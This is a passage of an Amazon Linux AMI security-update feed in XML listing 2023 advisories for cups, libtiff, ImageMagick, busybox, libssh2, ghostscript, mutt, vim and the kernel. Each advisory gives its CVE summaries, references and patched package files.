</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32360" title="" id="CVE-2023-32360" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups-debuginfo" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.24.amzn1" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.24.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.24.amzn1" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-67.24.amzn1.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.24.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.24.amzn1.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.24.amzn1" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-67.24.amzn1.i686.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.24.amzn1" epoch="1" 
arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.24.amzn1.i686.rpm</filename></package><package name="cups" version="1.4.2" release="67.24.amzn1" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-67.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1829</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1829: medium priority package update for libtiff</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0804:
LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3609, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.
CVE-2023-0803:
LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3516, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.
CVE-2023-0802:
LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3724, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.
CVE-2023-0801:
LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6778, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.
CVE-2023-0800:
LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3502, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0800" title="" id="CVE-2023-0800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0801" title="" id="CVE-2023-0801" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0802" title="" id="CVE-2023-0802" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0803" title="" id="CVE-2023-0803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0804" title="" id="CVE-2023-0804" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-static" version="4.0.3" release="35.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.44.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.44.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.44.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.44.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.44.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.44.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.44.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.44.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.44.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.44.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.44.amzn1" epoch="0" 
arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1830</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1830: medium priority package update for libtiff</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0798:
LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3400, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.
CVE-2023-0797:
LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6921, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.
CVE-2023-0796:
LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3592, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.
CVE-2023-0795:
LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3488, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0795" title="" id="CVE-2023-0795" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0796" title="" id="CVE-2023-0796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0797" title="" id="CVE-2023-0797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0798" title="" id="CVE-2023-0798" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="35.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.45.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.45.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.45.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.45.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.45.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.45.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.45.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.45.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.45.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.45.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.45.amzn1" epoch="0" 
arch="i686"><filename>Packages/libtiff-4.0.3-35.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1831</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1831: medium priority package update for ImageMagick</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48541:
A memory leak in ImageMagick 7.0.10-45 and 6.9.11-22 allows remote attackers to perform a denial of service via the "identify -help" command.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48541" title="" id="CVE-2022-48541" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-perl" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.28.amzn1" epoch="0" 
arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1832</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1832: medium priority package update for busybox</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48174:
There is a stack overflow vulnerability in ash.c:6030 in busybox before 1.35. In an Internet of Vehicles environment, this vulnerability can be escalated from command execution to arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48174" title="" id="CVE-2022-48174" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="busybox" version="1.34.1" release="1.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.34.1-1.16.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-debuginfo-1.34.1-1.16.amzn1.x86_64.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.34.1-1.16.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.16.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-debuginfo-1.34.1-1.16.amzn1.i686.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.16.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.34.1-1.16.amzn1.i686.rpm</filename></package><package name="busybox" version="1.34.1" release="1.16.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.34.1-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1833</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1833: medium priority package update for hwloc</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-47022:
An issue discovered in open-mpi hwloc 2.1.0 allows attackers to cause a denial of service or other unspecified impacts via glibc-cpuset in topology-linux.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47022" title="" id="CVE-2022-47022" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="hwloc-devel" version="1.7" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/hwloc-devel-1.7-3.8.amzn1.x86_64.rpm</filename></package><package name="hwloc-libs" version="1.7" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/hwloc-libs-1.7-3.8.amzn1.x86_64.rpm</filename></package><package name="hwloc-debuginfo" version="1.7" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/hwloc-debuginfo-1.7-3.8.amzn1.x86_64.rpm</filename></package><package name="hwloc" version="1.7" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/hwloc-1.7-3.8.amzn1.x86_64.rpm</filename></package><package name="hwloc-gui" version="1.7" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/hwloc-gui-1.7-3.8.amzn1.x86_64.rpm</filename></package><package name="hwloc-debuginfo" version="1.7" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/hwloc-debuginfo-1.7-3.8.amzn1.i686.rpm</filename></package><package name="hwloc-libs" version="1.7" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/hwloc-libs-1.7-3.8.amzn1.i686.rpm</filename></package><package name="hwloc-gui" version="1.7" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/hwloc-gui-1.7-3.8.amzn1.i686.rpm</filename></package><package name="hwloc" version="1.7" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/hwloc-1.7-3.8.amzn1.i686.rpm</filename></package><package name="hwloc-devel" version="1.7" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/hwloc-devel-1.7-3.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2023-1834</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1834: important priority package update for libssh2</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-22218:
An issue discovered in function _libssh2_packet_add in libssh2 1.10.0 allows attackers to access out-of-bounds memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-22218" title="" id="CVE-2020-22218" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libssh2-devel" version="1.4.2" release="3.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-devel-1.4.2-3.14.amzn1.x86_64.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-docs-1.4.2-3.14.amzn1.x86_64.rpm</filename></package><package name="libssh2" version="1.4.2" release="3.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-1.4.2-3.14.amzn1.x86_64.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-debuginfo-1.4.2-3.14.amzn1.x86_64.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.14.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-docs-1.4.2-3.14.amzn1.i686.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.14.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-debuginfo-1.4.2-3.14.amzn1.i686.rpm</filename></package><package name="libssh2" version="1.4.2" release="3.14.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-1.4.2-3.14.amzn1.i686.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="3.14.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-devel-1.4.2-3.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1835</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1835: important priority package update for ghostscript</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>important</severity><description>Package updates 
are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-21890:
Buffer Overflow vulnerability in clj_media_size function in devices/gdevclj.c in Artifex Ghostscript 9.50 allows remote attackers to cause a denial of service or other unspecified impact(s) via opening of a crafted PDF document.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21890" title="" id="CVE-2020-21890" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-debuginfo" version="8.70" release="24.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.30.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.30.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.30.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.30.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.30.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.30.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.30.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.30.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.30.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.30.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.30.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1836</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1836: medium priority package update for mutt</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4875:
Null pointer dereference when composing from a specially crafted draft message in Mutt >1.5.2 <2.2.12
CVE-2023-4874:
Null pointer dereference when viewing a specially crafted email in Mutt >1.5.2 <2.2.12
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4874" title="" id="CVE-2023-4874" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4875" title="" id="CVE-2023-4875" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mutt-debuginfo" version="1.5.20" release="7.20091214hg736b6a.10.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-debuginfo-1.5.20-7.20091214hg736b6a.10.amzn1.x86_64.rpm</filename></package><package name="mutt" version="1.5.20" release="7.20091214hg736b6a.10.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-1.5.20-7.20091214hg736b6a.10.amzn1.x86_64.rpm</filename></package><package name="mutt" version="1.5.20" release="7.20091214hg736b6a.10.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-1.5.20-7.20091214hg736b6a.10.amzn1.i686.rpm</filename></package><package name="mutt-debuginfo" version="1.5.20" release="7.20091214hg736b6a.10.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-debuginfo-1.5.20-7.20091214hg736b6a.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1837</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1837: important priority package update for vim</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4752:
Use After Free in GitHub repository vim/vim prior to 9.0.1858.
CVE-2023-4750:
Use After Free in GitHub repository vim/vim prior to 9.0.1857.
CVE-2023-4733:
Use After Free in GitHub repository vim/vim prior to 9.0.1840.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4733" title="" id="CVE-2023-4733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4750" title="" id="CVE-2023-4750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4752" title="" id="CVE-2023-4752" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-minimal" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1712-1.83.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1712-1.83.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1712-1.83.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1712-1.83.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1712-1.83.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1712-1.83.amzn1.noarch.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="x86_64"><filename>Packages/xxd-9.0.1712-1.83.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1712-1.83.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1712" release="1.83.amzn1" epoch="2" 
arch="i686"><filename>Packages/vim-debuginfo-9.0.1712-1.83.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1712-1.83.amzn1.i686.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="i686"><filename>Packages/xxd-9.0.1712-1.83.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.1712" release="1.83.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1712-1.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1838</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1838: important priority package update for kernel</title><issued date="2023-09-27 22:15:00" /><updated date="2024-03-13 19:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4921:
A use-after-free vulnerability in the Linux kernel's net/sched: sch_qfq component can be exploited to achieve local privilege escalation.
When the plug qdisc is used as a class of the qfq qdisc, sending network packets triggers use-after-free in qfq_dequeue() due to the incorrect .peek handler of sch_plug and lack of error checking in agg_dequeue().
We recommend upgrading past commit 8fc134fee27f2263988ae38920bc03da416b03d8.
CVE-2023-4623:
A use-after-free vulnerability in the Linux kernel's net/sched: sch_hfsc (HFSC qdisc traffic control) component can be exploited to achieve local privilege escalation.
If a class with a link-sharing curve (i.e. with the HFSC_FSC flag set) has a parent without a link-sharing curve, then init_vf() will call vttree_insert() on the parent, but vttree_remove() will be skipped in update_vf(). This leaves a dangling pointer that can cause a use-after-free.
We recommend upgrading past commit b3d26c5702c7d6c45456326e56d2ccf3f103e60f.
CVE-2023-4622:
A use-after-free vulnerability in the Linux kernel's af_unix component can be exploited to achieve local privilege escalation.
The unix_stream_sendpage() function tries to add data to the last skb in the peer's recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.
We recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.
CVE-2023-45871:
An issue was discovered in drivers/net/ethernet/intel/igb/igb_main.c in the IGB driver in the Linux kernel before 6.5.3. A buffer size may not be adequate for frames larger than the MTU.
CVE-2023-42755:
A flaw was found in rsvp_change(). The root cause is a slab-out-of-bounds access, but since the offset to the original pointer is an `unsign int` fully controlled by users, the behavior is usually a wild pointer access.
CVE-2023-42753:
The upstream commit describes this issue as follows:
The missing IP_SET_HASH_WITH_NET0 macro in ip_set_hash_netportnet can lead to the use of wrong `CIDR_POS(c)` for calculating array offsets, which can lead to integer underflow. As a result, it leads to slab out-of-bound access.
CVE-2023-4244:
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.
Due to a race condition between nf_tables netlink control plane transaction and nft_set element garbage collection, it is possible to underflow the reference counter causing a use-after-free vulnerability.
We recommend upgrading past commit 3e91b0ebd994635df2346353322ac51ce84ce6d8.
CVE-2023-4207:
A use-after-free vulnerability in the Linux kernel's net/sched: cls_fw component can be exploited to achieve local privilege escalation.
When fw_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.
We recommend upgrading past commit 76e42ae831991c828cffa8c37736ebfb831ad5ec.
CVE-2023-39194:
net: xfrm: Fix xfrm_address_filter OOB read
NOTE: https://www.zerodayinitiative.com/advisories/ZDI-23-1492/
NOTE: https://git.kernel.org/linus/dfa73c17d55b921e1d4e154976de35317e43a93a (6.5-rc7)
CVE-2023-39193:
netfilter: xt_sctp: validate the flag_info count
NOTE: https://www.zerodayinitiative.com/advisories/ZDI-23-1491/
NOTE: https://git.kernel.org/linus/e99476497687ef9e850748fe6d232264f30bc8f9 (6.6-rc1)
CVE-2023-39192:
netfilter: xt_u32: validate user space input
NOTE: https://www.zerodayinitiative.com/advisories/ZDI-23-1490/
NOTE: https://git.kernel.org/linus/69c5d284f67089b4750d28ff6ac6f52ec224b330 (6.6-rc1)
CVE-2023-3772:
A flaw was found in the Linux kernel's IP framework for transforming packets (XFRM subsystem). This issue may allow a malicious user with CAP_NET_ADMIN privileges to directly dereference a NULL pointer in xfrm_update_ae_params(), leading to a possible kernel crash and denial of service.
